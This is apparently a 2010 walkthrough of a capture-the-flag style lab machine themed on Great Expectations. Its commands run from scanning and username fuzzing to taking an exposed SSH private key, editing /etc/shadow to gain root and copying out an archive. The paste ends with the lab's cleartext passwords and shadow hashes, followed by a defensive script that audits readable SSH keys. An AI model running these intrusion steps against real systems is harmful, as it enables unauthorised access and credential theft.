g0tmi1k

a guest
Feb 12th, 2010
nmap -n 192.168.2.1-255

nmap -n -sV -sS -O 192.168.2.100

nmap -n -sV -sS -O 192.168.2.101

firefox 192.168.2.100

[+]kate -> list of possible usernames. Save. Filename: usernames.txt

firefox 192.168.2.101

[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' in front. -> http://192.168.2.101 -> 80

firefox 192.168.2.101/~pirrip

[+]kate -> Update usernames with the ones which we got a response from. Save.

[+]BackTrack -> Web Application Analysis -> Web (frontend) -> nikto2

./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124

firefox 192.168.2.101/~pirrip/.ssh

// Save both files

mv /root/id_rsa /root/.ssh/id_rsa

mv /root/id_rsa.pub /root/.ssh/id_rsa.pub

chmod 000 /root/.ssh/id_rsa

chmod 000 /root/.ssh/id_rsa.pub

ssh pirrip@192.168.2.100
// Yes

mailx
// 3 - we see that havisham's password is 'changeme'. 7 - we see that pirrip's password is '0l1v3rTw1st'

cd /etc/

vi passwd

// kate -> Update usernames with only valid ones.

vi group

sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st

su
// Password: 0l1v3rTw1st

cd /root/

ls -a

cd .save/

ls -a

chmod -R 777 /root/

//In BackTrack//

scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/

unzip great_expectations.zip

tar xf great_expectations.tar

strings Jan08

//In SSH//
sudo vi /var/mail/havisham

modprobe capability

//In BackTrack//
ftp 192.168.2.100
// Username: pirri. Password: 0l1v3rTw1st //

ls -a

//In SSH//

exit

//In BackTrack//

[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
// GAME OVER

----------------------------------------------------------------------------------------------------
Users
root:P1ckw1ckP@p3rs     root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme       havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st      pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:               magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------
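
Defender-side check for the exposure used at the ~pirrip/.ssh step above, as an added example that is not part of the original paste: it lists SSH private keys under per-user home directories that the "other" permission class can reach and read, which is what allows a web server with per-user directories to serve them. The function names and the assumption that homes sit one level below the directory passed in (e.g. /home) are mine.

```sh
#!/bin/sh
# Added example (not from the original paste): report SSH private keys in
# per-user home directories that any local account, including the web
# server's user, is able to read.
# Assumption: home directories sit one level below the root given as $1.

# Succeeds when path $1 has every permission bit of octal mask $2 set.
has_perm() {
    [ -n "$(find "$1" -prune -perm "-$2" 2>/dev/null)" ]
}

# Print each exposed private-key path, one per line.
audit_userdir_keys() {
    local root home key
    root=$1
    for home in "$root"/*/; do
        home=${home%/}
        [ -d "$home/.ssh" ] || continue
        # A web server needs o+x on both directories to reach the files...
        has_perm "$home" 001 && has_perm "$home/.ssh" 001 || continue
        for key in "$home"/.ssh/*; do
            [ -f "$key" ] || continue
            # ...and o+r on the file itself to serve it.
            has_perm "$key" 004 || continue
            # Report only files whose first line is a private-key header.
            if head -n 1 "$key" 2>/dev/null | grep -q 'PRIVATE KEY-----'; then
                printf '%s\n' "$key"
            fi
        done
    done
    return 0
}

# When a directory is given on the command line, audit it.
if [ "$#" -gt 0 ]; then
    audit_userdir_keys "$1"
fi
```

Any path it prints belongs in a mode-700 .ssh directory with the key at mode 600, and the key itself should be treated as compromised and replaced.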